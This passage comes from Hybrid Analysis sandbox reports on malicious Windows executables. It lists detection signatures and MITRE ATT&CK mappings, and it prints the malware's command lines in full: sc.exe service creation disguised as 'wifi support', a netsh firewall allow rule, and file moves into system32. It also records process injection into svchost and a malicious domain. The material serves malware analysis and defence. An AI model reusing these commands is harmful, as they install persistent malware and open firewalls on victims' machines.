\"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00000600)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00002276-2873-269-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00002276)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00003944)\n \"cmd.exe\" called \"FindNextFileW\" with parameter xagapalr.exe (UID: 00000000-00003944)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xagapalr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"xagapalr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"4361d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2227784\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000004221c741427f00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000602eb7673c34b7670000000000000000\" - (UID: 00000000-00004440)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00000600)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00000600)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"xagapalr.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\IEMWDXZD\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xagapalr.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\xagapalr.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has section name .text with entropy \"6.63010280368\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has section name .text with entropy \"7.97285529131\"\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a\" has section name .reloc with entropy \"6.22149605003\"\n \"xagapalr.exe\" has section name .text with entropy \"6.63010280368\"\n \"xagapalr.exe\" has section name .text with entropy \"7.97285529131\"\n \"xagapalr.exe\" has section name .reloc with entropy \"6.22149605003\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00002276)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00002276)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" (UID: 00000000-00002276)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003608)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\xagapalr.exe\" %WINDIR%\\\\system32\\\\iemwdxzd\\\\\" (UID: 00000000-00003944)\n Spawned process \"sc.exe\" with commandline \"create iemwdxzd binPath= \"%WINDIR%\\\\system32\\\\iemwdxzd\\\\xagapalr.exe /d\\\\\"C:\\\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00004412)\n Spawned process \"sc.exe\" with commandline \"description iemwdxzd \"wifi internet conection\"\" (UID: 00000000-00003148)\n Spawned process \"sc.exe\" with commandline \"start iemwdxzd\" (UID: 00000000-00004100)\n Spawned process \"xagapalr.exe\" with commandline \"/d\"C:\\\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\"\" (UID: 00000000-00004084)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00000600)\n Spawned process \"svchost.exe\" (UID: 00000000-00004440)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 492)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 596)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 596)\n \"3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 596)\n \"xagapalr.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"xagapalr.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"xagapalr.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"xagapalr.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"xagapalr.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00004084)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"xagapalr.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start iemwdxzd\" (UID: 00000000-00004100)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00000600)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef
https://hybrid-analysis.com/sample/3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef
Hybrid Analysis - Um_unhooking
{"size": 356352, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef", "sha256": "3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef", "av_detect": 81, "vx_family": "Win/malicious_confidence_100%", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 5, "total_processes": 1, "total_signatures": 164, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 25547)", "11 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 25547)"], "imported_objects": [], "file_analysis": ["File appears to contain raw COFF/OMF content", "File is the product of a small codebase (0 files)"], "total_file_compositions_imports": 3}, "processes": [{"uid": "00000000-00001188", "name": "3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe", "normalized_path": "C:\\3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe", "sha256": "3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 3}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Bootkit", "attck_id": "T1542.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542/003", "malicious_identifiers_count": 1, "parent": {"technique": "Pre-OS Boot", "attck_id": "T1542", "attck_id_wiki": "https://attack.mitre.org/techniques/T1542"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", 